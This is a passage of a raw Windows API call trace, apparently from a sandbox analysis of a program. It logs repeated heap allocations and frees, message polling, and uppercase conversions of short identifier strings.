returned 0x2a71718 [0174.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0174.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0174.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0174.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0174.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0174.023] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0174.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0174.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0174.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0174.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0174.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0174.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0174.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0174.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0174.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0174.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0174.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0174.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0174.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0174.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0174.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0174.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0174.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0174.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0174.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0174.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0174.025] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0174.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0174.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0174.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0174.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0174.025] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0174.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0174.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0174.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0174.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0174.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0174.026] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0174.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0174.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0174.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0174.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.026] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0174.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0174.026] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0174.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0174.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa888 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0174.027] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0174.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0174.027] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0174.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0174.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0174.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0174.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0174.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0174.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0174.027] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0174.027] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0174.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0174.028] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0174.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0174.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0174.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9a8 [0174.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74430 [0174.028] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0174.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0174.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0174.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0174.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0174.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0174.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0174.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0174.028] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0174.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0174.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0174.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0174.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0174.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0174.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0174.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0174.028] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0174.028] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0174.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0174.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0174.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0174.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74430 | out: hHeap=0x2af0000) returned 1 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0174.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0174.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0174.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0174.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0174.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0174.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0174.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0174.030] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0174.030] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0174.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0174.030] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0174.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0174.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0174.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8b8 [0174.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e90 [0174.030] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0174.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0174.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0174.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0174.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0174.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0174.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0174.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0174.030] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0174.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0174.030] 